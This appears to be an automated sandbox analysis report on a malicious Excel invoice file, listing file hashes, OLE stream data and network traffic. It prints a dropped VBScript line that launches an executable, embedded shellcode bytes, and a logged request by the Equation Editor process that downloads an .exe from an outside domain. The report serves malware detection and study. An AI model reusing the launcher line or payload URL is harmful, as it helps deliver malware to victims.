                                                    SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1GlSlTlTMu4dnriIM8lfQVn:DsO+vNlZ1Q1RlT2mA2n
                                                    MD5:53E5292C0AA6B8A852639152F91D8BA0
                                                    SHA1:A7CD051BF20BA1475E225E6B49392D871768E7C3
                                                    SHA-256:371EC639D393C68CE0084BAEEE5BCBC782D4DC6F0663374EB0FDA2DE08E7F328
                                                    SHA-512:DD218ADC701A34411D868CD36793D781DA549FF79520B165DEF80BBE169CC2A89D0121FE467193404B2763952D09397B441ABFF83EE07019BE9D535BC0263053
                                                    Malicious:true
                                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.c.o.m.p.l.a.c.e.n.c.e.\.o.u.t.v.a.u.n.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                    C:\Users\user\Desktop\~$FACTURA.xlsx

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):165
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                    Malicious:true
                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                    Static File Info

                                                    General

                                                    File type:Microsoft Excel 2007+
                                                    Entropy (8bit):7.998089695306738
                                                    TrID:
                                                    • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                    • ZIP compressed archive (8000/1) 18.60%
                                                    File name:FACTURA.xlsx
                                                    File size:2'130'920 bytes
                                                    MD5:0c7d9bbd0cfe3621f076aae883009e36
                                                    SHA1:58d9da251f4466a6cd9fb7fb7f0cbb196425db2e
                                                    SHA256:b326ee834d3e9c27a5712b91bf28ac789ea8f715dfd17cca0cd6d0cc5ef18c9f
                                                    SHA512:b27cf3ce6bf03c9f31c326cf067f0732e8fd840b1d50ad01b062396093a44380aa1c30b4c10f11337f0471e0d29669808a951cc9c683e9631a0346c34338f41c
                                                    SSDEEP:49152:oEjkXhHug9Kj/w6M3G8swX4aBLiLS2ORvvLwxhpnIeHW:bQXhOWur8RXLLD2xxPIH
                                                    TLSH:B9A533D5DC51634BDCF842F2CAF4786A158DD4D98CC4CF543AEADBA102818D8BAF8267
                                                    File Content Preview:PK.........=.Y.V.#............[Content_Types].xmlUT.....Vg..Vg..Vg.T.N.0..#..U.....!.....$@.. k.-,..............ik.?v.......Hh.......|....Z......@R^+.<.b.(....F/..X0.c-fD.BJlf..V!..H..S..i*.j.j..t08.M...J...r4.V.[*n..{.db.(..yY..*Fk.E........mM.:4..!...J.

                                                    File Icon

                                                    Icon Hash:2562ab89a7b7bfbf

                                                    Static OLE Info

                                                    General

                                                    Document Type:OpenXML
                                                    Number of OLE Files:1

                                                    OLE File "FACTURA.xlsx"

                                                    Indicators
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Summary
                                                    Author:EXCEL
                                                    Last Saved By:Administrator
                                                    Create Time:2022-05-16T17:34:45Z
                                                    Last Saved Time:2024-11-15T10:29:55Z
                                                    Creating Application:Microsoft Excel
                                                    Security:0
                                                    Document Summary
                                                    Thumbnail Scaling Desired:false
                                                    Company:
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:15.0300

                                                    Streams

                                                    Stream Path: \x1Ole10Native, File Type: data, Stream Size: 2840840
                                                    General
                                                    Stream Path:\x1Ole10Native
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:2840840
                                                    Entropy:5.980996799134152
                                                    Base64 Encoded:True
                                                    Data ASCII:. Y + . . ~ . G . . . < . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) D . . . . . . . . Y . ( . 1 . . \\ , . . . k . P X . P X P i . e . E ) K / ( m 9 . 6 P X W V V F P . . . . . . z . . b . . x g . . ^ ^ _ . . . . 9 . _ + M . . ~ v r . . . . . $ r ) ? j N # & X a m 9 W N . * A . > _ _ . . U g k & 0 . H $ q G . ; . . ( ^ T . $ . ^ j . c . . _ . - Z e X z r k # 3 ' . . e V Q 6 . " \\ s 9 j 3 . D . d R . . . l . m . S . A F E r * : a .
                                                    Data Raw:04 59 2b 00 03 7e 01 eb 47 0a 01 05 3c 93 c4 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e8 00 00 00 00 59 eb 02 d1 28 eb 04 31 11 eb 17 eb 5c eb 2c 8d a9 b5 02 00 00 6b d2 00 50 58 eb 1d eb f1 50 58 eb e5 eb e9 eb 50 69 d2 17 8f fd
                                                    Stream Path: VU3jluXN, File Type: empty, Stream Size: 0
                                                    General
                                                    Stream Path:VU3jluXN
                                                    CLSID:
                                                    File Type:empty
                                                    Stream Size:0
                                                    Entropy:0.0
                                                    Base64 Encoded:False
                                                    Data ASCII:
                                                    Data Raw:

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-10T07:04:57.871930+01002001046ET MALWARE UPX compressed file download possible malware3161.132.57.101443192.168.2.2249163TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 10, 2024 07:04:55.658694029 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:55.658767939 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:55.658823013 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:55.674977064 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:55.675026894 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.071790934 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.071947098 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.078217030 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.078234911 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.078538895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.078593969 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.153641939 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.195347071 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.589751005 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.589803934 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.589811087 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.589824915 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.589858055 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.589869976 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.589880943 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.589924097 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.679989100 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.680090904 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.793139935 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.793205023 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.826461077 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.826556921 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.851583958 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.851675034 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.871979952 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.872061014 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.975378990 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.975460052 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:57.994975090 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:57.995101929 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.008394003 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.008502960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.021668911 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.021761894 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.033766985 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.033869982 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.045892954 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.046005964 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.092533112 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.092653036 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.100214005 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.100317955 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.168623924 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.168756962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.179131985 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.179279089 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.186464071 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.186572075 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.194026947 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.194123983 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.201452017 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.201545000 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.211267948 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.211363077 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.218724012 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.218815088 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.224566936 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.224658012 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.256345987 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.256474018 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.262293100 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.262411118 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.267852068 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.267940044 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.357255936 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.357327938 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.362662077 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.362744093 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.367453098 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.367528915 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.372164965 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.372231960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.376920938 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.376987934 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.383088112 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.383162022 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.387737036 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.387811899 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.392539024 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.392607927 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.397114992 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.397177935 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.403212070 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.403285980 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.407154083 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.407228947 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.413137913 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.413213968 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.417731047 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.417800903 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.449711084 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.449791908 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.454328060 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.454399109 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.459930897 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.460004091 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.550086021 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.550179958 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.553899050 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.553972960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.557430029 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.557497025 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.562278986 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.562351942 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.565907955 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.565975904 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.569744110 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.569820881 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.573412895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.573479891 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.578212023 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.578279972 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.581996918 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.582063913 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.586224079 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.586293936 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.590018034 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.590089083 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.593698025 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.593780041 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.598778963 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.598844051 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.640783072 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.640866995 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.643879890 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.643942118 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.647597075 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.647682905 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.650830030 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.741619110 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.741759062 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.744245052 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.744342089 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.747678995 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.747750998 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.751979113 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.752043009 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.755311012 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.755395889 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.759052992 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.759119987 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.762064934 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.762135029 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.766371965 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.766438961 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.769689083 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.769748926 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.773159027 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.773257971 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.776870966 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.776937962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.780318975 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.780395985 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.784631968 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.784730911 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.787946939 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.788033962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.834547997 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.834665060 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.838836908 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.838912964 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.842154980 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.842236996 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.936160088 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.936280966 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.939361095 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.939448118 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.942629099 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.942753077 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.946810007 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.946892977 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.950092077 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.950160980 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.953444958 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.953510046 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.957725048 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.957809925 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.960953951 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.961052895 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.964809895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.964890957 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.968035936 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.968115091 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.971434116 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.971534014 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.974642038 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.974725962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.978929043 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.979010105 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.025809050 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.025958061 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.029153109 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.029277086 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.033364058 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.033447027 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.126660109 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.126769066 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.129757881 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.129842043 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.133040905 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.133114100 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.137281895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.137357950 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.140501976 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.140573025 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.144010067 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.144085884 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.147221088 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.147316933 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.151478052 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.151595116 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.154773951 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.154851913 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.158077002 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.158150911 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.161803007 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.161870003 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.165121078 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.165241957 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.169339895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.169413090 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.217730999 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.217875957 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.217881918 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.217943907 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.218544960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.218565941 CET44349163161.132.57.101192.168.2.22

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 10, 2024 07:04:55.038240910 CET5456253192.168.2.228.8.8.8
                                                    Dec 10, 2024 07:04:55.616468906 CET53545628.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 10, 2024 07:04:55.038240910 CET192.168.2.228.8.8.80x710eStandard query (0)www.grupodulcemar.peA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 10, 2024 07:04:55.616468906 CET8.8.8.8192.168.2.220x710eNo error (0)www.grupodulcemar.pegrupodulcemar.peCNAME (Canonical name)IN (0x0001)false
                                                    Dec 10, 2024 07:04:55.616468906 CET8.8.8.8192.168.2.220x710eNo error (0)grupodulcemar.pe161.132.57.101A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.grupodulcemar.pe

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.2249163161.132.57.1014433680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-10 06:04:57 UTC325OUTGET /HKP098767890HJ.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: www.grupodulcemar.pe
                                                    Connection: Keep-Alive
                                                    2024-12-10 06:04:57 UTC223INHTTP/1.1 200 OK
                                                    Date: Tue, 10 Dec 2024 06:04:57 GMT
                                                    Server: Apache
                                                    Last-Modified: Mon, 09 Dec 2024 15:39:04 GMT
                                                    Accept-Ranges: bytes
                                                    Content-Length: 832512
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
